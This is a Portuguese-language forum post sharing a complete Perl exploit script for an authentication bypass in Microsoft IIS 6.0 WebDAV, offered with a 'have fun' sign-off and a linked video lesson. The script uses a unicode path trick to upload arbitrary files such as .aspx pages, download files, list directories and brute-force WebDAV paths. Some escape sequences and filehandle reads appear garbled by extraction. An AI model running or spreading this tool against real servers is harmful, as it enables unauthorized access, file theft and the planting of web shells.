Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

WebDAV Auth Bypass Exploit

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    WebDAV Auth Bypass Exploit

    Ver Video Aula:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    download Video Aula:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Tool in perl:
    Código:
    #!/usr/bin/perl
#  ********* !!! WARNING !!! *********
#  *   FOR SECURITY TESTiNG ONLY!    *
#  ***********************************
#  MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
#  v1.1 add brute force dir fuction.
#  v1.0 download?upload and list dir.
#
#  Usage:
#		IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
#		-target								eg.: 192.168.1.1
#   -port									eg.: 80
#   -method								eg.: g
#    (p:PUT,g:GET,l:LIST)
#   -webdavpath						eg.: webdav
#   -BruteForcePath				eg.: brute force webdav path
#   -file	(optional)			eg.: test.aspx
#  Example:
#		put a file:
#				IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
#		get a file:
#				IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
#		list dir:
#				IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
#		brute force + list dir:
#				IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
#		brute force + get file:
#				IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx

use IO::Socket;
use Getopt::Long; 

use threads;
use threads::shared;

# Globals Go Here.
my $target;				# Host being probed.
my $port;					# Webserver port.
my $method;				# HTTP Method, PUT GET or .
my $xpath;				# WebDAV path on Webserver.
my $bpath;				# Bruteforce WebDAV path.
my $file;					# file name.
my $httpmethod;
my $Host_Header;	# The Host header has to be changed

GetOptions(
        "target=s"      => $target,
        "port=i"        => $port,
        "method=s"      => $method,
        "xpath=s"       => $xpath,
        "bpath=s"       => $bpath,
        "file=s"        => $file,
        "help|?"        => sub {
                                hello();
                                exit(0);
                           }
); 

$error .= "Error: You must specify a target hostn" if ((!$target));
$error .= "Error: You must specify a target portn" if ((!$port));
$error .= "Error: You must specify a put,get or list methodn" if ((!$method));
$error .= "Error: You must specify a webdav pathn" if ((!$xpath) && (!$bpath));
$error .= "Error: You must specify a upload or download file namen" if ((!$file) && $method != "l"); 

if ($error) {
        print "Try $0 -help or -?' for more information.n$errorn" ;
        exit;
} 

hello();

if ($method eq "p") {
	$httpmethod = "PUT";
} elsif ($method eq "g") {
  $httpmethod = "GET";
} elsif ($method eq "l") {
  $httpmethod = "PROPFIND";
} else {
  print "$method Method not accept !!!n";
  exit(0);
}

# ************************************
# * We testing WebDAV methods first  *
# ************************************
webdavtest($target,$port);
#end of WebDAV testing.
# ****************************************
# * We try to brute forceing WebDAV path *
# ****************************************
if ($bpath) {
  $xpath = webdavbf($target,$port,$bpath);
}
#end of brute force
print "-" x 60 ."n";
if ($httpmethod eq "PUT") {
  my $content;
  my $data;
  #cacl file size
  $filesize = -s $file;
  print "$file size is $filesize bytesn";
  open(INFO, $file) || die("Could not open file!");
  #@lines=;
  binmode(INFO); #binary
  while(read(INFO, $data, $filesize))
  {
  	$content .= $data;
  }
  close(INFO);
  #print $content;

  $Host_Header = "Translate: frnHost: $targetrnContent-Length: $filesizern";
} elsif ($httpmethod eq "GET") {
	$Host_Header = "Translate: frnHost: $targetrnConnection: closernrn";
} elsif ($httpmethod eq "PROPFIND") {
	$Host_Header = "Host: $targetrnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn";
	$Host_Header = $Host_Header."";
}
print "-" x 60 ."n$httpmethod $file , Please wait ...n"."-" x 60 ."n";

# ************************
# * Sending HTTP request *
# ************************
if ($httpmethod eq "PUT") {
  @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Headerrn$content",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $portn";}
} elsif ($httpmethod eq "GET") {
	@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0rn$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $portn";}
} elsif ($httpmethod eq "PROPFIND") {
	@results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0rn$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $portn";}
}
#print @results;
$flag="off";
if ($results[0] =~ m|^HTTP/1.[01] 2[0-9][0-9] |){
	$flag="on";
} elsif ($results[0] =~ m|^HTTP/1.[01] 4[0-9][0-9] |){
	$flag="off";
}	

print "-" x 60 ."n";
if ($flag eq "on") {
  if ($httpmethod eq "PUT") {
	  print "$httpmethod $file from [$target:$port/$xpath] OKrn";
  } elsif ($httpmethod eq "GET") {
    my $line_no = 0;
    my $counter = @results;
    foreach $line (@results){
  	  ++$line_no;
	    if ($line =~ /^Accept-Ranges: bytesrn/){
	  	  last;
	    }
    }

    # Write file to disk
    open(OUTFILE, ">$file") or die "Could not write to file: $!n";
    binmode (OUTFILE);
    print OUTFILE @results[$line_no+1..$counter];
    close(OUTFILE);	 

	  print "$httpmethod $file from [$target:$port/$xpath] OKrnPlease check $file on local diskrn";	  

  } elsif ($httpmethod eq "PROPFIND") {
    print "$httpmethod path list from [$target:$port/$xpath] OKrn";
  	foreach $line (@results){
	    if ($line =~ /^<?xml version=/i){
  		  my @list = split("", $line);
  		  foreach $path (@list) {
  		  	$no = index($path,"<");
  		  	$result.=substr($path, 0, $no)."n";
  		  }
  		  print $result;
	  	  last;
	    }
    }
  }
} else {
	print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!rn";
}
print "-" x 60 ."n";
exit(0);

# *************
# * Sendraw-2 *
# *************
sub sendraw2 {
  my ($pstr,$realip,$realport,$timeout)=@_;
  my $target2 = inet_aton($realip);
  my $flagexit=0;
  $SIG{ALRM}=&ermm;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
  alarm($timeout);
  if (connect(S,pack "SnA4x8",2,$realport,$target2)){
    alarm(0);
    my @in;
    select(S); $|=1;
    print $pstr;
    alarm($timeout);
    while(){
      if ($flagexit == 1){
        close (S);
        print STDOUT "Timeoutn";
        return "Timeout";
      }
      push @in, $_;
    }
    alarm(0);
    select(STDOUT);
    close(S);
    return @in;
  } else {return "0";}
}

sub ermm{
        $flagexit=1;
        close (S);
}

sub webdavtest {
	my ($testip,$testport)=@_;
  print "-" x 60 ."n";
  print "Testing WebDAV methods [$testip $testport]n";
  print "-" x 60 ."n";
  @results=sendraw2("OPTIONS / HTTP/1.0rnrn",$testip,$testport,10);
  if ($#results < 1){die "10s timeout to $target on port $testportn";}
  #print @results;
  $flag="off";
  foreach $line (@results){
	  if ($line =~ /^Server: /){
		  ($left,$right)=split(/:/,$line);
		  $right =~ s/ //g;
		  print "$target : Server type is : $right";

	    if ($right !~ /Microsoft-IIS/i){
		    print "$target : Not a Microsoft IIS Servern";
		    exit(0);
	    }
	  }

	  if ($line =~ /^DAV: /){
		  $flag="on";
	  }

	  if ($line =~ /^Public: / && $flag eq "on"){
	    ($left,$right)=split(/:/,$line);
	    $right =~ s/ //g;
	    print "$target : Method type is : $right";
	    if ($right !~ /$httpmethod/i){
	      print "$target : Not allow $httpmethod on this WebDAV Servern";
	      exit(0);
	    } else {
	      $flag="on";
	    }
	  }
  }
  if ($flag eq "off") {
    print "$target : WebDAV disablen";
    exit(0);
  }
}

sub webdavbf {
	my ($bfip,$bfport,$bfpath)=@_;
  print "-" x 60 ."n";
  print "Try to brute forceing WebDAV path ...n";
  print "-" x 60 ."n";
  open(BF, $bfpath) || die("Could not open file!");
  foreach $lines (){
  	chomp($lines);

	  $Host_Header = "Host: $bfiprnConnection: closernContent-Type: text/xml; charset="utf-8"rnContent-Length: 0rnrn";
	  $Host_Header = $Host_Header."";

	  @results=sendraw2("PROPFIND /$lines/ HTTP/1.0rn$Host_Header",$bfip,$bfport,10);
    if ($#results < 1){die "10s timeout to $bfip on port $bfportn";}

    print "[$lines]...$results[0]";

   	#maybe this response
   	#HTTP/1.1 207 Multi-Status
    if ($results[0] =~ m|^HTTP/1.[01] 401 |){
    	print "Find out path on [$lines]n";
	    return $lines;
	    last;
    }
  }
  close(BF) ;
  print "Sorry... We can not find any more path... :( n";
  exit(0);
}

sub hello{
  print "n";
  print "t ##################################################n";
  print "t #    MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0  #n";
  print "t #  **************** !!! WARNING !!! **************#n";
  print "t #  **** FOR PRIVATE AND EDUCATIONAL USE ONLY! ****#n";
  print "t #  ***********************************************#n";
  print "t #  Written by csgcsg 090529                       #n";
  print "t ###################################################n";
  print "nt $0 -target -port -method -webdavpath [-file]n";
  print "nt -targettt eg.: 192.168.1.1n";
  print "t -portttt eg.: 80n";
  print "t -method (p:PUT, g:GET, l:LIST)t eg.: gn";
  print "t -webdavpath|-bruteForcePathtt eg.: webdavn";
  print "t -filettt eg.: test.aspxnn";
  print "tUsage eg.: nt$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspxn";
};
    divirtam se =)
    Similar Threads
    Tags: 108, deep, exploit, http, skin, url, webdav
    • Top
Anterior template Avançar
X
Working...
X